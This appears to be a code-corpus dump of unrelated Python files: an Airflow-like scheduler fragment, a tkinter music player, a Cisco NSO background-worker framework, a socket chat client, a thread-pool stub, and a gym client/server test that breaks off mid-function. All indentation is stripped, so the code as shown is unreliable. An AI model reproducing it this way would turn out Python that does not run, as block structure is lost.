# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
serialized_dags = self.processor_agent.harvest_serialized_dags()
self.log.debug("Harvested %d SimpleDAGs", len(serialized_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(serialized_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
self._emit_pool_metrics()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as all files have been processed %d times", self.num_runs
)
break
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if simple_dag_bag.serialized_dags:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag: SimpleDagBag) -> None:
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(
simple_dag_bag=simple_dag_bag,
old_states=[State.UP_FOR_RETRY],
new_state=State.FAILED
)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(
simple_dag_bag=simple_dag_bag,
old_states=[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE,
State.SENSING],
new_state=State.NONE
)
self._execute_task_instances(simple_dag_bag)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
|
main.py | import os
import threading
import time
import pygame
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from pygame import mixer
import mutagen
from mutagen.mp3 import MP3
from mutagen.flac import FLAC
from mutagen.id3 import ID3
# creating new window
root = Tk()
# creating menu bar itself
menuBar = Menu(root)
# configuring of menu bar, get ready for sub-menu items
root.config(menu=menuBar)
# creating sub-menu File, using menuBar
subMenu = Menu(menuBar, tearoff=0)
# it contains full path + filename
playlist = []
def browse_file():
global filename
filename = filedialog.askopenfilename()
statusBar["text"] = filename
add_to_playlist(os.path.basename(
filename))
# clicking on Add Button function
# f is name of song without path
def add_to_playlist(f):
# appearing list of songs in root window
index = 0
playlistbox.insert(index, f)
# inserting songs into list playlist
playlist.insert(index, filename)
# increasing index everytime
index += 1
menuBar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open CTRL+O", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
# About menu - opens new window with information: Title and Copy
def about():
tkinter.messagebox.showinfo(
"sarcino music_player", "created by @sarcino", )
# creating sub-menu Help, using menuBar
subMenu = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About", command=about)
# initialize mixer which allows us to play music files
mixer.init()
# size of the window after opening
root.geometry("600x350")
# title of the window
root.title("sarcino music_player")
# icon, r = raw string
root.iconbitmap(r"images\icon.ico")
# showing total length of song which is playing right now
# lenghtlabel = Label(root, text="")
# lenghtlabel.pack(pady=5)
currenttimelabel = ttk.Label(root, text="")
currenttimelabel.pack(pady=5)
def show_details():
# spliting name of the file from extension
file_data = os.path.splitext(filename)
global bitrate
if file_data[1] == ".mp3":
audio = MP3(filename)
total_length = audio.info.length
bitrate = audio.info.bitrate
bitrate = round(bitrate / 1000)
elif file_data[1] == ".flac":
audio = FLAC(filename)
total_length = audio.info.length
bitrate = audio.info.bitrate
bitrate = round(bitrate / 1000)
else:
# loading the sound and store it into variable
a = mixer.Sound(filename)
# get the length of stored sound in seconds
total_length = a.get_length()
bitrate = "-"
# take totallength and calculating remainder
mins, secs = divmod(total_length, 60)
# rounding
mins = round(mins)
secs = round(secs)
global timeformat
# showing minutes and seconds in 2 digits format
timeformat = "{:02d}:{:02d}".format(mins, secs)
#lenghtlabel["text"] = "Total lenght: " + timeformat
# THREADING - first argument function, arguments - argument of the function
t1 = threading.Thread(target=start_count, args=(total_length,))
# + calling it
t1.start()
# counting current time of playing song
# t is our total_length
def start_count(t):
global paused
current_time = 0
# mixer.music.get_busy() - returns false when we press stop button or music stops playing
while current_time <= t and mixer.music.get_busy():
if paused:
continue
else:
current_mins, current_secs = divmod(current_time, 60)
current_mins = round(current_mins)
current_secs = round(current_secs)
global timeformat_current
timeformat_current = "{:02d}:{:02d}".format(
current_mins, current_secs)
currenttimelabel['text'] = "current time: " + timeformat_current
# sleep for one second and continue += 1 second
time.sleep(1)
current_time = current_time + 1
# play button = play image
def play_music():
global paused
# if paused button is true, unpause this
if paused:
# playback resumed
mixer.music.unpause()
statusBar["text"] = os.path.basename(
filename) + " | " + "duration: " + timeformat + " | " + "bitrate: " + str(bitrate) + " kbps"
# paused button is false again
paused = False
else:
try:
# when switching song, stop music and wait for one second
stop_music()
time.sleep(1)
# the result is a song from the list which was selected
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
# saving the path of the selected song into variable
play_it = playlist[selected_song]
mixer.music.load(play_it)
show_details()
mixer.music.play()
statusBar["text"] = os.path.basename(
play_it) + " | " + "duration: " + timeformat + " | " + "bitrate: " + str(bitrate) + " kbps"
except:
tkinter.messagebox.showerror(
"Not Found", "music_player couldn't find a file. Please check again.")
# stop button = stop image
def stop_music():
mixer.music.stop()
statusBar["text"] = "playback stopped"
paused = False
def pause_music():
global paused
paused = True
mixer.music.pause()
statusBar["text"] = "playback paused"
def rewind_music():
play_music()
def set_vol(val):
# value is string, must be converted into integer
volume = float(val) / 100
# set_volume function takes value from 0 to 1 only
mixer.music.set_volume(volume)
# by default is not False
muted = False
def mute_music():
global muted
# if muted is true
if muted:
# set default values = unmute music
mixer.music.set_volume(0.25)
volumeBtn.configure(image=volume)
scale.set(25)
muted = False
else:
# mute the music
mixer.music.set_volume(0)
# once I clicked on the volume picture, it changes to the mute picture
volumeBtn.configure(image=mute)
# scale bar will show 0
scale.set(0)
muted = True
# function for deleting song from playlist
def del_song():
global selected_song
# a song from the list which was selected
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
# delete selected_song from playlistbox
playlistbox.delete(selected_song)
# remove an item from playlist
playlist.pop(selected_song)
# creating frame for buttons - to be able to align them in one row
# used for play, stop, pause, rewind buttons, mute, volume control
middleframe = Frame(root)
middleframe.pack(anchor="w", pady=5, padx=5)
bottomframe = Frame(root)
bottomframe.pack(anchor="e", pady=5, padx=5)
# double click on name of the song = play music
def left_click(event):
play_music()
# playlist - background of selected song, height in lines, width in characters
#playlistbox = Listbox(root, bd=1, height=10, width=70)
playlistbox = Listbox(root, bd=1, height=10)
# bind double left clicks
playlistbox.bind('<Double-1>', left_click)
# playlistbox.pack(pady=10)
playlistbox.pack()
# relative width and relative height = 100 % of the parrent widget => 100% width and sticks to the bottom
playlistbox.place(bordermode=INSIDE, y=170, relwidth=1.0, relheight=1.0)
# add to playlist button
add = PhotoImage(file="images/add.png")
addItemBtn = ttk.Button(bottomframe, image=add, command=browse_file)
addItemBtn.grid(row=0, column=0, padx=3, pady=0)
# delete from playlist button
delete = PhotoImage(file="images/delete.png")
delItemBtn = ttk.Button(bottomframe, image=delete, command=del_song)
delItemBtn.grid(row=0, column=1, padx=3, pady=0)
# play image - show in the default window
play = PhotoImage(file="images/play.png")
# play button is localized in middleframe, image variable play, function play music
playBtn = ttk.Button(middleframe, image=play, command=play_music)
playBtn.grid(row=0, column=0, padx=3)
# stop image - show in the default window
stop = PhotoImage(file="images/stop.png")
stopBtn = ttk.Button(middleframe, image=stop, command=stop_music)
stopBtn.grid(row=0, column=1, padx=3)
# pause image
pause = PhotoImage(file="images/pause.png")
pauseBtn = ttk.Button(middleframe, image=pause, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=3)
# rewind button
rewind = PhotoImage(file="images/rewind.png")
rewindBtn = ttk.Button(middleframe, image=rewind, command=rewind_music)
rewindBtn.grid(row=0, column=3, padx=3)
# volume control
scale = ttk.Scale(middleframe, from_=0, to=100, orient=HORIZONTAL,
cursor="hand2", command_=set_vol)
# default volume value when you open the player
# show 25
scale.set(25)
# play 25 volume value
mixer.music.set_volume(0.25)
scale.grid(row=0, column=4, pady=20, padx=20)
# mute/ unmute button
mute = PhotoImage(file="images/mute.png")
volume = PhotoImage(file="images/volume.png")
volumeBtn = ttk.Button(middleframe, image=volume, command=mute_music)
volumeBtn.grid(row=0, column=5, padx=3)
# anchor = align of text, W is for west, left
statusBar = Label(root, text="Welcome to music_player",
relief=SUNKEN, anchor=W)
statusBar.pack(side=BOTTOM, fill=X)
# keyboard events
root.bind("<Control-o>", lambda e: browse_file())
# start the program
root.mainloop()
|
background_process.py | # -*- mode: python; python-indent: 4 -*-
"""A micro-framework for running background processes in Cisco NSO Python VM.
Running any kind of background workers in Cisco NSO can be rather tricky. This
will help you out! Just define a function that does what you want and create a
Process instance to run it!
We react to:
- background worker process dying (will restart it)
- NCS package events, like redeploy
- configuration changes (disable the background worker)
- HA events (if we are a slave)
"""
import logging
import logging.handlers
import multiprocessing
import os
import select
import socket
import threading
import time
import traceback
import typing
import ncs
from ncs.experimental import Subscriber
def _get_handler_impls(logger: logging.Logger) -> typing.Iterable[logging.Handler]:
"""For a given Logger instance, find the registered handlers.
A Logger instance may have handlers registered in the 'handlers' list.
Usually there is one handler registered to the Root Logger.
This function uses the same algorithm as Logger.callHandlers to find
all relevant handlers.
"""
c = logger
while c:
for hdlr in c.handlers:
yield hdlr
if not c.propagate:
c = None #break out
else:
c = c.parent
def _bg_wrapper(pipe_unused, log_q, log_config_q, log_level, bg_fun, *bg_fun_args):
"""Internal wrapper for the background worker function.
Used to set up logging via a QueueHandler in the child process. The other end
of the queue is observed by a QueueListener in the parent process.
"""
queue_hdlr = logging.handlers.QueueHandler(log_q)
root = logging.getLogger()
root.setLevel(log_level)
root.addHandler(queue_hdlr)
# thread to monitor log level changes and reconfigure the root logger level
log_reconf = LogReconfigurator(log_config_q, root)
log_reconf.start()
try:
bg_fun(*bg_fun_args)
except Exception as e:
root.error('Unhandled error in {} - {}: {}'.format(bg_fun.__name__, type(e).__name__, e))
root.debug(traceback.format_exc())
class LogReconfigurator(threading.Thread):
def __init__(self, q, log_root):
super(LogReconfigurator, self).__init__()
self.daemon = True
self.q = q
self.log_root = log_root
def run(self):
while True:
k, v = self.q.get()
if k is 'exit':
return
self.log_root.setLevel(v)
def stop(self):
self.q.put(('exit', None))
class Process(threading.Thread):
"""Supervisor for running the main background process and reacting to
various events
"""
def __init__(self, app, bg_fun, bg_fun_args=None, config_path=None):
super(Process, self).__init__()
self.app = app
self.bg_fun = bg_fun
if bg_fun_args is None:
bg_fun_args = []
self.bg_fun_args = bg_fun_args
self.config_path = config_path
self.parent_pipe = None
self.log = app.log
self.name = "{}.{}".format(self.app.__class__.__module__,
self.app.__class__.__name__)
self.log.info("{} supervisor starting".format(self.name))
self.vmid = self.app._ncs_id
self.mp_ctx = multiprocessing.get_context('spawn')
self.q = self.mp_ctx.Queue()
# start the config subscriber thread
if self.config_path is not None:
self.config_subscriber = Subscriber(app=self.app, log=self.log)
subscriber_iter = ConfigSubscriber(self.q, self.config_path)
subscriber_iter.register(self.config_subscriber)
self.config_subscriber.start()
# start the HA event listener thread
self.ha_event_listener = HaEventListener(app=self.app, q=self.q)
self.ha_event_listener.start()
# start the logging QueueListener thread
hdlrs = list(_get_handler_impls(self.app._logger))
self.log_queue = self.mp_ctx.Queue()
self.queue_listener = logging.handlers.QueueListener(self.log_queue, *hdlrs, respect_handler_level=True)
self.queue_listener.start()
self.current_log_level = self.app._logger.getEffectiveLevel()
# start log config CDB subscriber
self.log_config_q = self.mp_ctx.Queue()
self.log_config_subscriber = Subscriber(app=self.app, log=self.log)
log_subscriber_iter = LogConfigSubscriber(self.log_config_q, self.vmid)
log_subscriber_iter.register(self.log_config_subscriber)
self.log_config_subscriber.start()
self.worker = None
# Read initial configuration, using two separate transactions
with ncs.maapi.Maapi() as m:
with ncs.maapi.Session(m, '{}_supervisor'.format(self.name), 'system'):
# in the 1st transaction read config data from the 'enabled' leaf
with m.start_read_trans() as t_read:
if config_path is not None:
enabled = t_read.get_elem(self.config_path)
self.config_enabled = bool(enabled)
else:
# if there is no config_path we assume the process is always enabled
self.config_enabled = True
# In the 2nd transaction read operational data regarding HA.
# This is an expensive operation invoking a data provider, thus
# we don't want to incur any unnecessary locks
with m.start_read_trans(db=ncs.OPERATIONAL) as oper_t_read:
# Check if HA is enabled. This can only be configured in
# ncs.conf and requires NSO restart, so it is fine if we
# just read it the once.
if oper_t_read.exists("/tfnm:ncs-state/tfnm:ha"):
self.ha_enabled = True
else:
self.ha_enabled = False
# determine HA state if HA is enabled
if self.ha_enabled:
ha_mode = str(ncs.maagic.get_node(oper_t_read, '/tfnm:ncs-state/tfnm:ha/tfnm:mode'))
self.ha_master = (ha_mode == 'master')
def run(self):
self.app.add_running_thread(self.name + ' (Supervisor)')
while True:
try:
should_run = self.config_enabled and (not self.ha_enabled or self.ha_master)
if should_run and (self.worker is None or not self.worker.is_alive()):
self.log.info("Background worker process should run but is not running, starting")
if self.worker is not None:
self.worker_stop()
self.worker_start()
if self.worker is not None and self.worker.is_alive() and not should_run:
self.log.info("Background worker process is running but should not run, stopping")
self.worker_stop()
# check for input
waitable_rfds = [self.q._reader]
if should_run:
waitable_rfds.append(self.parent_pipe)
rfds, _, _ = select.select(waitable_rfds, [], [])
for rfd in rfds:
if rfd == self.q._reader:
k, v = self.q.get()
if k == 'exit':
return
elif k == 'enabled':
self.config_enabled = v
elif k == "ha-master":
self.ha_master = v
if rfd == self.parent_pipe:
# getting a readable event on the pipe should mean the
# child is dead - wait for it to die and start again
# we'll restart it at the top of the loop
self.log.info("Child process died")
if self.worker.is_alive():
self.worker.join()
except Exception as e:
self.log.error('Unhandled exception in the supervisor thread: {} ({})'.format(type(e).__name__, e))
self.log.debug(traceback.format_exc())
time.sleep(1)
def stop(self):
"""stop is called when the supervisor thread should stop and is part of
the standard Python interface for threading.Thread
"""
# stop the HA event listener
self.log.debug("{}: stopping HA event listener".format(self.name))
self.ha_event_listener.stop()
# stop config CDB subscriber
self.log.debug("{}: stopping config CDB subscriber".format(self.name))
if self.config_path is not None:
self.config_subscriber.stop()
# stop log config CDB subscriber
self.log.debug("{}: stopping log config CDB subscriber".format(self.name))
self.log_config_subscriber.stop()
# stop the logging QueueListener
self.log.debug("{}: stopping logging QueueListener".format(self.name))
self.queue_listener.stop()
# stop us, the supervisor
self.log.debug("{}: stopping supervisor thread".format(self.name))
self.q.put(('exit', None))
self.join()
self.app.del_running_thread(self.name + ' (Supervisor)')
# stop the background worker process
self.log.debug("{}: stopping background worker process".format(self.name))
self.worker_stop()
def worker_start(self):
"""Starts the background worker process
"""
self.log.info("{}: starting the background worker process".format(self.name))
# Instead of using the usual worker thread, we use a separate process here.
# This allows us to terminate the process on package reload / NSO shutdown.
# using multiprocessing.Pipe which is shareable across a spawned
# process, while os.pipe only works, per default over to a forked
# child
self.parent_pipe, child_pipe = self.mp_ctx.Pipe()
# Instead of calling the bg_fun worker function directly, call our
# internal wrapper to set up things like inter-process logging through
# a queue.
args = [child_pipe, self.log_queue, self.log_config_q, self.current_log_level, self.bg_fun] + self.bg_fun_args
self.worker = self.mp_ctx.Process(target=_bg_wrapper, args=args)
self.worker.start()
# close child pipe in parent so only child is in possession of file
# handle, which means we get EOF when the child dies
child_pipe.close()
def worker_stop(self):
"""Stops the background worker process
"""
if self.worker is None:
self.log.info("{}: asked to stop worker but background worker does not exist".format(self.name))
return
if self.worker.is_alive():
self.log.info("{}: stopping the background worker process".format(self.name))
self.worker.terminate()
self.worker.join(timeout=1)
if self.worker.is_alive():
self.log.error("{}: worker not terminated on time, alive: {} process: {}".format(self, self.worker.is_alive(), self.worker))
class ConfigSubscriber(object):
"""CDB subscriber for background worker process
It is assumed that there is an 'enabled' leaf that controls whether a
background worker process should be enabled or disabled. Given the path to
that leaf, this subscriber can monitor it and send any changes to the
supervisor which in turn starts or stops the background worker process.
The enabled leaf has to be a boolean where true means the background worker
process is enabled and should run.
"""
def __init__(self, q, config_path):
self.q = q
self.config_path = config_path
def register(self, subscriber):
subscriber.register(self.config_path, priority=101, iter_obj=self)
def pre_iterate(self):
return {'enabled': False}
def iterate(self, keypath_unused, operation_unused, oldval_unused, newval, state):
state['enabled'] = newval
return ncs.ITER_RECURSE
def should_post_iterate(self, state_unused):
return True
def post_iterate(self, state):
self.q.put(("enabled", bool(state['enabled'])))
class LogConfigSubscriber(object):
"""CDB subscriber for python-vm logging level
This subscribers monitors /python-vm/logging/level and
/python-vm/logging/vm-levels{vmid}/level and propagates any changes to the
child process which can then in turn log at the appropriate level. VM
specific level naturally take precedence over the global level.
"""
def __init__(self, q, vmid):
self.q = q
self.vmid = vmid
# read in initial values for these nodes
# a CDB subscriber only naturally gets changes but if we are to emit a
# sane value we have to know what both underlying (global & vm specific
# log level) are and thus must read it in first
with ncs.maapi.single_read_trans('', 'system') as t_read:
try:
self.global_level = ncs.maagic.get_node(t_read, '/python-vm/logging/level')
except Exception:
self.global_level = None
try:
self.vm_level = ncs.maagic.get_node(t_read, '/python-vm/logging/vm-levels{{{}}}/level'.format(self.vmid))
except Exception:
self.vm_level = None
def register(self, subscriber):
subscriber.register('/python-vm/logging/level', priority=101, iter_obj=self)
# we don't include /level here at the end as then we won't get notified
# when the whole vm-levels list entry is deleted, we still get when
# /levels is being set though (and it is mandatory so we know it will
# always be there for whenever a vm-levels list entry exists)
subscriber.register('/python-vm/logging/vm-levels{{{}}}'.format(self.vmid), priority=101, iter_obj=self)
def pre_iterate(self):
return {}
def iterate(self, keypath, operation_unused, oldval_unused, newval, unused_state):
if str(keypath[-3]) == "vm-levels":
self.vm_level = newval
else:
self.global_level = newval
return ncs.ITER_RECURSE
def should_post_iterate(self, unused_state):
return True
def post_iterate(self, unused_state):
# the log level enum in the YANG model maps the integer values to
# python log levels quite nicely just by adding 1 and multiplying by 10
configured_level = int(self.vm_level or self.global_level)
new_level = (configured_level+1)*10
self.q.put(("log-level", new_level))
class HaEventListener(threading.Thread):
"""HA Event Listener
HA events, like HA-mode transitions, are exposed over a notification API.
We listen on that and forward relevant messages over the queue to the
supervisor which can act accordingly.
We use a WaitableEvent rather than a threading.Event since the former
allows us to wait on it using a select loop. The HA events are received
over a socket which can also be waited upon using a select loop, thus
making it possible to wait for the two inputs we have using a single select
loop.
"""
def __init__(self, app, q):
super(HaEventListener, self).__init__()
self.app = app
self.log = app.log
self.q = q
self.log.info('{} supervisor: init'.format(self))
self.exit_flag = WaitableEvent()
def run(self):
self.app.add_running_thread(self.__class__.__name__ + ' (HA event listener)')
self.log.info('run() HA event listener')
from _ncs import events
mask = events.NOTIF_HA_INFO
event_socket = socket.socket()
events.notifications_connect(event_socket, mask, ip='127.0.0.1', port=ncs.PORT)
while True:
rl, _, _ = select.select([self.exit_flag, event_socket], [], [])
if self.exit_flag in rl:
event_socket.close()
return
notification = events.read_notification(event_socket)
# Can this fail? Could we get a KeyError here? Afraid to catch it
# because I don't know what it could mean.
ha_notif_type = notification['hnot']['type']
if ha_notif_type == events.HA_INFO_IS_MASTER:
self.q.put(('ha-master', True))
elif ha_notif_type == events.HA_INFO_IS_NONE:
self.q.put(('ha-master', False))
elif ha_notif_type == events.HA_INFO_SLAVE_INITIALIZED:
self.q.put(('ha-master', False))
def stop(self):
self.exit_flag.set()
self.join()
self.app.del_running_thread(self.__class__.__name__ + ' (HA event listener)')
class WaitableEvent:
"""Provides an abstract object that can be used to resume select loops with
indefinite waits from another thread or process. This mimics the standard
threading.Event interface."""
def __init__(self):
self._read_fd, self._write_fd = os.pipe()
def wait(self, timeout=None):
rfds, _, _ = select.select([self._read_fd], [], [], timeout)
return self._read_fd in rfds
def is_set(self):
return self.wait(0)
def isSet(self):
return self.wait(0)
def clear(self):
if self.isSet():
os.read(self._read_fd, 1)
def set(self):
if not self.isSet():
os.write(self._write_fd, b'1')
def fileno(self):
"""Return the FD number of the read side of the pipe, allows this
object to be used with select.select()
"""
return self._read_fd
def __del__(self):
os.close(self._read_fd)
os.close(self._write_fd)
|
Client.py | from tkinter import *
import tkinter
import socket
from threading import Thread
from time import sleep
def enter(self):
global message_sent
message = my_message.get()
my_message.set("")
s.send(bytes(message, "utf8"))
message_sent = True
if message == "#quit":
s.close()
window.quit()
message_sent = False
def receive():
while (True):
try:
global message_sent
message = s.recv(1024).decode("utf8")
message_list.insert(tkinter.END,message)
if (message_sent != True):
print("\a")
message_sent = False
except:
break
def send():
global message_sent
message = my_message.get()
my_message.set("")
s.send(bytes(message, "utf8"))
message_sent = True
if message == "#quit":
s.close()
window.quit()
def closing():
my_message.set("#quit")
send()
while(True):
try:
host = input("Enter Host IP : ")
port = int(input("Enter Port : "))
break
except:
print("Please verify details entered")
window = Tk()
data = open("../assets/version.txt" , "r").read()
window.title("Chat Room 101 | " + data)
window.iconbitmap("../assets/Icon.ico")
window.configure(bg="white")
message_frame = Frame(window,height=100,width=100,bg="black")
my_message = StringVar()
my_message.set("")
scroll_bar = Scrollbar(message_frame)
message_list = Listbox(message_frame,height = 15,width = 100,bg = "black", fg = "white", yscrollcommand=scroll_bar.set)
scroll_bar.pack(side=RIGHT,fill=Y)
message_list.pack(side=LEFT,fill=BOTH)
message_frame.pack()
button_label = Label(window,text = "Enter Your Message",bg="white")
button_label.pack()
text_field = Entry(window,textvariable=my_message, bg="white",width = 50)
text_field.pack()
send_button = Button(window,text = "Send", bg="white", command = send)
send_button.pack()
window.bind('<Return>',enter)
window.protocol("WM_DELETE_WINDOW",closing)
s = socket.socket()
try:
s.connect((host,port))
except:
print("Please Verify Host IP and Port Number")
sleep(5)
sys.exit(0)
recieve_thread = Thread(target=receive)
recieve_thread.start()
mainloop() |
threadpool.py | import threading
import queue
from concurrent.futures import thread
import atexit
__author__ = 'zz'
# shutdown program immediately
atexit.unregister(thread._python_exit)
thread_pool = thread.ThreadPoolExecutor(4)
# class ThreadPoll:
# def __init__(self, max_workers=4):
# self.max_workers = max_workers
# self.threads = []
# self.queue = queue.Queue()
# self.start()
#
# def start(self):
# for i in range(self.max_workers):
# t = threading.Thread(target=self.work)
# t.daemon = True
# t.start()
#
# def work(self):
# while True:
# fn = self.queue.get()
# if fn == None:
# return
# fn()
#
# def submit(self, fn):
# self.queue.put(fn)
#
# def shutdown(self, wait=False):
# self.queue.put(None)
|
client_server_test.py | import threading
import os
import functools
import sys
import tempfile
import pytest
import numpy as np
import gym
import gym.spaces
from .client import Client
from .server import Server
class ImageEnv:
"""
Image based environment
"""
def __init__(self):
self.observation_space = gym.spaces.Box(
shape=(), low=0, high=255, dtype=np.uint8
)
self.action_space = gym.spaces.Discrete(3)
self._obs = self.observation_space.sample()
self.spec = None
self.metadata = {}
def reset(self):
return self._obs
def step(self, act):
return self._obs, 0, False, {}
def close(self):
pass
class Vectorize:
"""
Convert an Env into a VecEnv
"""
def __init__(self, make_env_fns):
self._act = None
self._envs = [fn() for fn in make_env_fns]
self.observation_space = self._envs[0].observation_space
self.action_space = self._envs[0].action_space
assert not hasattr(self.action_space, "spaces")
self.spec = self._envs[0].spec
self.metadata = self._envs[0].metadata
def _merge_obs(self, raw_obs):
if hasattr(self.observation_space, "spaces"):
# dict space
obs = {}
for name in self.observation_space.spaces:
obs[name] = np.array([o[name] for o in raw_obs])
return obs
else:
return np.array(raw_obs)
def reset(self):
return self._merge_obs([env.reset() for env in self._envs])
def step_async(self, act):
self._act = act
def step_wait(self):
raw_obs = []
rews = []
dones = []
infos = []
for i, e in enumerate(self._envs):
o, r, d, i = e.step(self._act[i])
raw_obs.append(o)
rews.append(r)
dones.append(d)
infos.append(i)
return self._merge_obs(raw_obs), np.array(rews), np.array(dones), infos
def render(self, mode="human"):
assert mode == "rgb_array"
return np.array([e.render(mode) for e in self._envs])
def close(self):
for e in self._envs:
e.close()
class NopEnvironment:
def __init__(self):
self.observation_space = gym.spaces.Dict(
[("obs", gym.spaces.Box(low=0, high=3, shape=(2, 3), dtype=np.int32))]
)
self.action_space = gym.spaces.Box(
low=-1.0, high=1.0, shape=(2, 3), dtype=np.float32
)
self.spec = None
self.metadata = {}
self._obs = self.observation_space.sample()
def reset(self):
return self._obs
def step(self, action):
return self._obs, 1.0, False, {}
def close(self):
pass
# from https://github.com/openai/baselines/blob/master/baselines/common/vec_env/test_vec_env.py
class _SimpleEnv(gym.Env):
"""
An environment with a pre-determined observation space
and RNG seed.
"""
def __init__(self, seed, shape, dtype, dict_obs_space):
self._rand = np.random.RandomState(seed=seed)
self._dict_obs_space = dict_obs_space
self._dtype = dtype
self._max_steps = seed + 1
self._cur_obs = None
self._cur_step = 0
self.action_space = gym.spaces.Box(low=0, high=100, shape=shape, dtype=dtype)
self._obs_keys = ["obs_a", "obs_b"]
if self._dict_obs_space:
spaces = []
self._start_obs = {}
for key in self._obs_keys:
spaces.append((key, self.action_space))
self._start_obs[key] = np.array(
self._rand.randint(0, 0x100, size=shape), dtype=dtype
)
self.observation_space = gym.spaces.Dict(spaces)
else:
self.observation_space = self.action_space
self._start_obs = np.array(
self._rand.randint(0, 0x100, size=shape), dtype=dtype
)
def step(self, action):
if self._dict_obs_space:
for key in self._obs_keys:
self._cur_obs[key] += np.array(action, dtype=self._dtype)
else:
self._cur_obs += np.array(action, dtype=self._dtype)
self._cur_step += 1
done = self._cur_step >= self._max_steps
reward = self._cur_step / self._max_steps
return self._cur_obs, reward, done, {}
def reset(self):
self._cur_obs = self._start_obs
self._cur_step = 0
return self._cur_obs
def render(self, mode=None):
assert mode == "rgb_array"
return np.array(
self._rand.randint(0, 0x100, size=(16, 8, 4)), dtype=self._dtype
)
use_shared_memory_options = [True, False]
if sys.platform != "linux":
use_shared_memory_options = [False]
@pytest.mark.parametrize("use_shared_memory", use_shared_memory_options)
@pytest.mark.parametrize("dict_obs_space", [True, False])
def test_simple_env(use_shared_memory, dict_obs_space):
dtype = "uint8"
shape = (3, 8)
num_envs = 32
num_steps = 1000
make_envs = [
functools.partial(_SimpleEnv, seed, shape, dtype, dict_obs_space=dict_obs_space)
for seed in range(num_envs)
]
np.random.seed(31337)
env1 = Vectorize(make_envs)
if sys.platform == "win32":
socket_kind = "tcp"
addr = ("127.0.0.1", 0)
else:
socket_kind = "unix"
addr = os.path.join(tempfile.mkdtemp(), "netenv.sock")
if os.path.exists(addr):
os.remove(addr)
s = Server(
addr=addr,
socket_kind=socket_kind,
make_venv=lambda num_envs: Vectorize(make_envs),
)
addr = s.listen()
t = threading.Thread(target=s.run, daemon=True)
t.start()
env2 = Client(
addr=addr,
socket_kind=socket_kind,
num_envs=num_envs,
env_options={},
reuse_arrays=True,
use_shared_memory=use_shared_memory,
)
actions = np.array(
np.random.randint(0, 0x100, size=(num_envs,) + shape), dtype=dtype
)
def assert_arrays_close(arr1, arr2):
assert np.array(arr1).shape == np.array(arr2).shape
assert np.allclose(arr1, arr2)
def assert_objs_close(obj1, obj2):
if isinstance(obj1, dict):
assert obj1.keys() == obj2.keys()
for key in obj1.keys():
assert_arrays_close(obj1[key], obj2[key])
else:
assert_arrays_close(obj1, obj2)
try:
obs1, obs2 = env1.reset(), env2.reset()
assert_objs_close(obs1, obs2)
for _ in range(num_steps):
actions = np.array(
np.random.randint(0, 0x100, size=(num_envs,) + shape), dtype=dtype
)
for env in [env1, env2]:
env.step_async(actions)
outs1 = env1.step_wait()
outs2 = env2.step_wait()
for out1, out2 in zip(outs1[:3], outs2[:3]):
assert_objs_close(out1, out2)
rend1, rend2 = env1.render(mode="rgb_array"), env2.render(mode="rgb_array")
assert_objs_close(rend1, rend2)
finally:
env1.close()
env2.close()
@pytest.mark.skipif(sys.platform == "win32", reason="does not run on windows")
@pytest.mark.parametrize("use_shared_memory", use_shared_memory_options)
@pytest.mark.parametrize("make_env", [NopEnvironment, ImageEnv])
def test_unix_env_speed(use_shared_memory, make_env, benchmark):
env_speed(
"unix",
make_env=make_env,
benchmark=benchmark,
use_shared_memory=use_shared_memory,
)
@pytest.mark.parametrize("make_env", [NopEnvironment, ImageEnv])
def test_tcp_env_speed(make_env, benchmark):
env_speed("tcp", make_env=make_env, benchmark=benchmark)
@pytest.mark.parametrize(
"wrapper,make_env", [("Vectorize", NopEnvironment), ("Vectorize", ImageEnv)]
)
def test_base_env_speed(wrapper, make_env, benchmark):
env_speed(wrapper, make_env=make_env, benchmark=benchmark)
def env_speed(kind, make_env, benchmark, use_shared_memory=False):
n = 2
if kind == "Vectorize":
def make_venv():
return Vectorize([make_env] * n)
else:
socket_kind = kind
# can't use Vectorize with retro since you can only have one instance per process
vec_env_class = Vectorize
def make_server_venv(num_envs):
return vec_env_class([make_env] * num_envs)
if socket_kind == "unix":
addr = os.path.join(tempfile.mkdtemp(), "netenv.sock")
if os.path.exists(addr):
